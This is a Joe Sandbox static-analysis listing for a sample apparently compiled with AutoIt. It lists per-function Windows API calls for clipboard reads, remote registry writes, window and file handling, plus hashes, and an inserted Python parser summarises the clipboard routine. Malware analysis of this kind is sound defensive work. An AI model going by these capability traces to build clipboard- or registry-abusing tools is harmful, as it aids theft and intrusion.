                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                            • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                            • API String ID: 2910397461-517079104
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: __wcsnicmp
                                                            • String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
                                                            • API String ID: 1038674560-3360698832
                                                            APIs
                                                            • LoadCursorW.USER32(00000000,00007F89), ref: 00430754
                                                            • SetCursor.USER32(00000000), ref: 0043075B
                                                            • LoadCursorW.USER32(00000000,00007F8A), ref: 0043076C
                                                            • SetCursor.USER32(00000000), ref: 00430773
                                                            • LoadCursorW.USER32(00000000,00007F03), ref: 00430784
                                                            • SetCursor.USER32(00000000), ref: 0043078B
                                                            • LoadCursorW.USER32(00000000,00007F8B), ref: 0043079C
                                                            • SetCursor.USER32(00000000), ref: 004307A3
                                                            • LoadCursorW.USER32(00000000,00007F01), ref: 004307B4
                                                            • SetCursor.USER32(00000000), ref: 004307BB
                                                            • LoadCursorW.USER32(00000000,00007F88), ref: 004307CC
                                                            • SetCursor.USER32(00000000), ref: 004307D3
                                                            • LoadCursorW.USER32(00000000,00007F86), ref: 004307E4
                                                            • SetCursor.USER32(00000000), ref: 004307EB
                                                            • LoadCursorW.USER32(00000000,00007F83), ref: 004307FC
                                                            • SetCursor.USER32(00000000), ref: 00430803
                                                            • LoadCursorW.USER32(00000000,00007F85), ref: 00430814
                                                            • SetCursor.USER32(00000000), ref: 0043081B
                                                            • LoadCursorW.USER32(00000000,00007F82), ref: 0043082C
                                                            • SetCursor.USER32(00000000), ref: 00430833
                                                            • LoadCursorW.USER32(00000000,00007F84), ref: 00430844
                                                            • SetCursor.USER32(00000000), ref: 0043084B
                                                            • LoadCursorW.USER32(00000000,00007F04), ref: 0043085C
                                                            • SetCursor.USER32(00000000), ref: 00430863
                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 00430874
                                                            • SetCursor.USER32(00000000), ref: 0043087B
                                                            • SetCursor.USER32(00000000), ref: 00430887
                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 00430898
                                                            • SetCursor.USER32(00000000), ref: 0043089F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Cursor$Load
                                                            • String ID:
                                                            • API String ID: 1675784387-0
                                                            APIs
                                                            • GetSysColor.USER32(0000000E), ref: 00430913
                                                            • SetTextColor.GDI32(?,00000000), ref: 0043091B
                                                            • GetSysColor.USER32(00000012), ref: 00430933
                                                            • SetTextColor.GDI32(?,?), ref: 0043093B
                                                            • GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                                            • GetSysColor.USER32(0000000F), ref: 00430959
                                                            • CreateSolidBrush.GDI32(?), ref: 00430962
                                                            • GetSysColor.USER32(00000011), ref: 00430979
                                                            • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                                            • SelectObject.GDI32(?,00000000), ref: 0043099C
                                                            • SetBkColor.GDI32(?,?), ref: 004309A6
                                                            • SelectObject.GDI32(?,?), ref: 004309B4
                                                            • InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                                            • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                                            • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                                            • GetWindowTextW.USER32(00000000,00000000,?), ref: 00430A5A
                                                            • InflateRect.USER32(?,000000FD,000000FD), ref: 00430A86
                                                            • DrawFocusRect.USER32(?,?), ref: 00430A91
                                                            • GetSysColor.USER32(00000011), ref: 00430A9F
                                                            • SetTextColor.GDI32(?,00000000), ref: 00430AA7
                                                            • DrawTextW.USER32(?,?,000000FF,?,00000105), ref: 00430ABC
                                                            • SelectObject.GDI32(?,?), ref: 00430AD0
                                                            • DeleteObject.GDI32(00000105), ref: 00430ADC
                                                            • SelectObject.GDI32(?,?), ref: 00430AE3
                                                            • DeleteObject.GDI32(?), ref: 00430AE9
                                                            • SetTextColor.GDI32(?,?), ref: 00430AF0
                                                            • SetBkColor.GDI32(?,?), ref: 00430AFB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                            • String ID:
                                                            • API String ID: 1582027408-0
                                                            • Opcode ID: 86b869e5b8bb6c2dba163effb8278b4f001f0824fd106c928e18bea154194c17
                                                            • Instruction ID: b12033eb3fa9204049de4d7caedd8dcf025edfa44633034d6aae7949f8ecba99
                                                            • Opcode Fuzzy Hash: 86b869e5b8bb6c2dba163effb8278b4f001f0824fd106c928e18bea154194c17
                                                            • Instruction Fuzzy Hash: 6F713071900209BFDB04DFA8DD88EAEBBB9FF48710F104619F915A7290D774A941CFA8
                                                            APIs
                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046BAE6
                                                            • RegCreateKeyExW.ADVAPI32(?,?,00000000,00484EA8,00000000,?,00000000,?,?,?), ref: 0046BB40
                                                            • RegCloseKey.ADVAPI32(?,00000001,00000000,00000000,00000000), ref: 0046BB8A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: CloseConnectCreateRegistry
                                                            • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                            • API String ID: 3217815495-966354055
                                                            • Opcode ID: cce921d97e24dbf253ef9f1627752c5d4fb6d5c9aca8633edc33abbdd9bc0d54
                                                            • Instruction ID: 14c723365299aea1e32a80c9e2d98689f85295d348ed372ee81e16963ac3f886
                                                            • Opcode Fuzzy Hash: cce921d97e24dbf253ef9f1627752c5d4fb6d5c9aca8633edc33abbdd9bc0d54
                                                            • Instruction Fuzzy Hash: BCE18171604200ABD710EF65C885F1BB7E8EF88704F14895EB949DB352D739ED41CBA9
                                                            APIs
                                                            • GetCursorPos.USER32(?), ref: 004566AE
                                                            • GetDesktopWindow.USER32 ref: 004566C3
                                                            • GetWindowRect.USER32(00000000), ref: 004566CA
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00456722
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00456735
                                                            • DestroyWindow.USER32(?), ref: 00456746
                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00456794
                                                            • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 004567B2
                                                            • SendMessageW.USER32(?,00000418,00000000,?), ref: 004567C6
                                                            • SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 004567D6
                                                            • SendMessageW.USER32(?,00000421,?,?), ref: 004567F6
                                                            • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 0045680C
                                                            • IsWindowVisible.USER32(?), ref: 0045682C
                                                            • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00456848
                                                            • SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 0045685C
                                                            • GetWindowRect.USER32(?,?), ref: 00456873
                                                            • MonitorFromPoint.USER32(?,00000001,00000002), ref: 00456891
                                                            • GetMonitorInfoW.USER32(00000000,?), ref: 004568A9
                                                            • CopyRect.USER32(?,?), ref: 004568BE
                                                            • SendMessageW.USER32(?,00000412,00000000), ref: 00456914
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: MessageSendWindow$Rect$LongMonitor$CopyCreateCursorDesktopDestroyFromInfoPointVisible
                                                            • String ID: ($,$tooltips_class32
                                                            • API String ID: 225202481-3320066284
                                                            • Opcode ID: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                                            • Instruction ID: fcdb4dd5bfb9c4cfeeadc9569793f3eee26ed74f2078e1bfb0220ba6a1b85fea
                                                            • Opcode Fuzzy Hash: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                                            • Instruction Fuzzy Hash: 4CB17170A00205AFDB54DFA4CD85BAEB7B4BF48304F10895DE919BB282D778A949CB58
                                                            APIs
                                                            • OpenClipboard.USER32(?), ref: 0046DCE7
                                                            • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                                                            • GetClipboardData.USER32(0000000D), ref: 0046DD01
                                                            • CloseClipboard.USER32 ref: 0046DD0D
                                                            • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                                                            • CloseClipboard.USER32 ref: 0046DD41
                                                            • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                                                            • GetClipboardData.USER32(00000001), ref: 0046DD8D
                                                            • CloseClipboard.USER32 ref: 0046DD99
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                                                            • String ID:
                                                            • API String ID: 15083398-0
                                                            • Opcode ID: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                                                            • Instruction ID: c6f05cb0c77453757aa6b00544986da50a17ac1627668c5aecb5782462309948
                                                            • Opcode Fuzzy Hash: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                                                            • Instruction Fuzzy Hash: CE81B072704201ABD310EF65DD8AB5EB7A8FF94315F00482EF605E72D1EB74E905879A
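Added example, not part of the Joe Sandbox report or of the analysed sample: a small Python parser for the "APIs" listing format used in these function entries, run on the clipboard routine at 0046DCE7 above. It resolves the clipboard-format constants passed to IsClipboardFormatAvailable and GetClipboardData (0000000D is CF_UNICODETEXT, 00000001 is CF_TEXT) and reports whether the routine also calls GlobalLock on the returned handle, which is what separates actually reading clipboard text from merely probing which formats are present. The listing order is static disassembly order, not execution order, so the summary makes no claim about which CloseClipboard call belongs to which path. The function and field names below are this example's own.

```python
"""Parse Joe Sandbox 'APIs' listing lines and summarise a clipboard read.

Added example; not part of the Joe Sandbox report or the sample. SAMPLE is
the API listing of the function at 0046DCE7 copied from the report (plus one
section header to show that non-call lines are skipped). Lines are in the
order the disassembler lists them, not execution order, so the summary only
says which calls are present and with which constants.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Standard clipboard formats from <winuser.h>.
CF_TEXT = 0x1
CF_UNICODETEXT = 0xD
CF_NAMES = {CF_TEXT: "CF_TEXT", CF_UNICODETEXT: "CF_UNICODETEXT"}

# "• Name.MODULE(args), ref: ADDR" or "• Name.MODULE ref: ADDR" (no args).
LINE_RE = re.compile(
    r"^\s*(?:•\s*)?(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})"
)

SAMPLE = """\
• OpenClipboard.USER32(?), ref: 0046DCE7
• IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
• GetClipboardData.USER32(0000000D), ref: 0046DD01
• CloseClipboard.USER32 ref: 0046DD0D
• GlobalLock.KERNEL32(00000000), ref: 0046DD37
• CloseClipboard.USER32 ref: 0046DD41
• IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
• GetClipboardData.USER32(00000001), ref: 0046DD8D
• CloseClipboard.USER32 ref: 0046DD99
Memory Dump Source
"""


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: int


def parse_api_listing(text: str) -> List[ApiCall]:
    """Turn listing lines into ApiCall records; non-matching lines are skipped."""
    calls: List[ApiCall] = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # section headers, "Part of subcall" notes, etc.
        raw = m.group("args") or ""
        args = [a.strip() for a in raw.split(",")] if raw else []
        calls.append(ApiCall(m.group("name"), m.group("module"),
                             args, int(m.group("ref"), 16)))
    return calls


def hex_arg(arg: str) -> Optional[int]:
    """Decode a hex argument; '?' (unknown) and symbolic args give None."""
    try:
        return int(arg, 16)
    except ValueError:
        return None


def summarise_clipboard_read(calls: List[ApiCall]) -> Optional[Dict]:
    """Describe a clipboard-read routine, or None if the function is not one.

    A read needs OpenClipboard and GetClipboardData; GlobalLock on the
    returned HGLOBAL shows the text is dereferenced, not just queried.
    """
    names = {c.name for c in calls}
    if not {"OpenClipboard", "GetClipboardData"} <= names:
        return None
    requested: List[str] = []   # formats passed to GetClipboardData
    checked: List[str] = []     # formats passed to IsClipboardFormatAvailable
    for c in calls:
        if c.name in ("GetClipboardData", "IsClipboardFormatAvailable") and c.args:
            fmt = hex_arg(c.args[0])
            if fmt is None:
                continue
            label = CF_NAMES.get(fmt, f"0x{fmt:X}")
            (requested if c.name == "GetClipboardData" else checked).append(label)
    return {
        "entry": f"{min(c.ref for c in calls):08X}",
        "formats_requested": requested,
        "formats_checked": checked,
        "locks_data": "GlobalLock" in names,
        "closes_clipboard": "CloseClipboard" in names,
    }


if __name__ == "__main__":
    print(summarise_clipboard_read(parse_api_listing(SAMPLE)))
```

The same parser works on any of the "APIs" blocks on this page; only the summariser is specific to the clipboard pattern, and a different pattern (registry writes, window creation) would get its own summariser over the same ApiCall records.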
                                                            APIs
                                                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                            • GetWindowRect.USER32(?,?), ref: 00471CF7
                                                            • GetClientRect.USER32(?,?), ref: 00471D05
                                                            • GetSystemMetrics.USER32(00000007), ref: 00471D0D
                                                            • GetSystemMetrics.USER32(00000008), ref: 00471D20
                                                            • GetSystemMetrics.USER32(00000004), ref: 00471D42
                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471D71
                                                            • GetSystemMetrics.USER32(00000007), ref: 00471D79
                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471DA3
                                                            • GetSystemMetrics.USER32(00000008), ref: 00471DAB
                                                            • GetSystemMetrics.USER32(00000004), ref: 00471DCF
                                                            • SetRect.USER32(?,00000000,00000000,?,?), ref: 00471DEE
                                                            • AdjustWindowRectEx.USER32(?,?,00000000,00000040), ref: 00471DFF
                                                            • CreateWindowExW.USER32(00000040,AutoIt v3 GUI,?,?,?,?,?,?,?,00000000,00400000,00000000), ref: 00471E35
                                                            • SetWindowLongW.USER32(00000000,000000EB,?), ref: 00471E6E
                                                            • GetClientRect.USER32(?,?), ref: 00471E8A
                                                            • GetStockObject.GDI32(00000011), ref: 00471EA6
                                                            • SendMessageW.USER32(?,00000030,00000000), ref: 00471EB2
                                                            • SetTimer.USER32(00000000,00000000,00000028,00462986), ref: 00471ED9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: System$Metrics$Rect$Window$ClientInfoParameters$AdjustCreateLongMessageObjectSendStockTimer_malloc
                                                            • String ID: @$AutoIt v3 GUI
                                                            • API String ID: 867697134-3359773793
                                                            • Opcode ID: d466945cffb50a7196a7867ec3c7573785653ff52612d7c288cf7d01b72dc8e8
                                                            • Instruction ID: 8cf5fd9e7b0abf2f472dad9b41bae804ea9cb1b32c1b51d65689880f1cfe2d6c
                                                            • Opcode Fuzzy Hash: d466945cffb50a7196a7867ec3c7573785653ff52612d7c288cf7d01b72dc8e8
                                                            • Instruction Fuzzy Hash: 7DC17F71A402059FDB14DFA8DD85BAF77B4FB58714F10862EFA09A7290DB78A840CB58
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: __wcsicoll$__wcsnicmp
                                                            • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:$pQH
                                                            • API String ID: 790654849-32604322
                                                            • Opcode ID: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                                                            • Instruction ID: c91e69f26a1c2718e03151092e39642ccf44f92bf630fd0466772f198d10bc2a
                                                            • Opcode Fuzzy Hash: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                                                            • Instruction Fuzzy Hash: CA317731A0420966DB10FAA2DD46BAE736C9F15315F20053BBD00BB2D5E7BC6E4587AE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 37a5c787a7b2188dc8d5479775b41731b0c96863aaa01ab20318fba061c3c2a8
                                                            • Instruction ID: 62dae473257cc2caee0a49c5626d46440081d624880130feb25903cd50123649
                                                            • Opcode Fuzzy Hash: 37a5c787a7b2188dc8d5479775b41731b0c96863aaa01ab20318fba061c3c2a8
                                                            • Instruction Fuzzy Hash: 84C128727002046BE724CFA8DC46FAFB7A4EF55311F00416AFA05DA2C1EBB99909C795
                                                            APIs
                                                              • Part of subcall function 00442C5A: __time64.LIBCMT ref: 00442C66
                                                            • _fseek.LIBCMT ref: 00452B3B
                                                            • __wsplitpath.LIBCMT ref: 00452B9B
                                                            • _wcscpy.LIBCMT ref: 00452BB0
                                                            • _wcscat.LIBCMT ref: 00452BC5
                                                            • __wsplitpath.LIBCMT ref: 00452BEF
                                                            • _wcscat.LIBCMT ref: 00452C07
                                                            • _wcscat.LIBCMT ref: 00452C1C
                                                            • __fread_nolock.LIBCMT ref: 00452C53
                                                            • __fread_nolock.LIBCMT ref: 00452C64
                                                            • __fread_nolock.LIBCMT ref: 00452C83
                                                            • __fread_nolock.LIBCMT ref: 00452C94
                                                            • __fread_nolock.LIBCMT ref: 00452CB5
                                                            • __fread_nolock.LIBCMT ref: 00452CC6
                                                            • __fread_nolock.LIBCMT ref: 00452CD7
                                                            • __fread_nolock.LIBCMT ref: 00452CE8
                                                              • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                                                              • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                                                              • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                                                              • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                                                              • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                                                              • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                                                              • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                                                            • __fread_nolock.LIBCMT ref: 00452D78
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: __fread_nolock$_wcscat_wcscpy$__wsplitpath$__time64_fseek
                                                            • String ID:
                                                            • API String ID: 2054058615-0
                                                            • Opcode ID: 0fea368d492e8b0ff51cb8fd7897a71ebf5dc00d39f6f8cf48bc83bd06102a16
                                                            • Instruction ID: 04d0e47ed4a2b248740d2851a73093f1b496c65d3ae4d984919b8c0089c9d159
                                                            • Opcode Fuzzy Hash: 0fea368d492e8b0ff51cb8fd7897a71ebf5dc00d39f6f8cf48bc83bd06102a16
                                                            • Instruction Fuzzy Hash: 6FC14EB2508340ABD720DF65D881EEFB7E8EFC9704F40492FF68987241E6759548CB66
                                                            APIs
                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004487BD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: Window
                                                            • String ID: 0
                                                            • API String ID: 2353593579-4108050209
                                                            • Opcode ID: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
